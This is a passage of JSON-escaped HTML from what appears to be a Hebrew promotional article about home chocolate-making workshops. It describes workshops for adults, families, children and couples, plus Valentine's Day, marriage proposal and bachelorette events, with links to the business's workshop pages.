\\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea<\\/a> \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\\\">\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/a> \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea<\\/a> \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 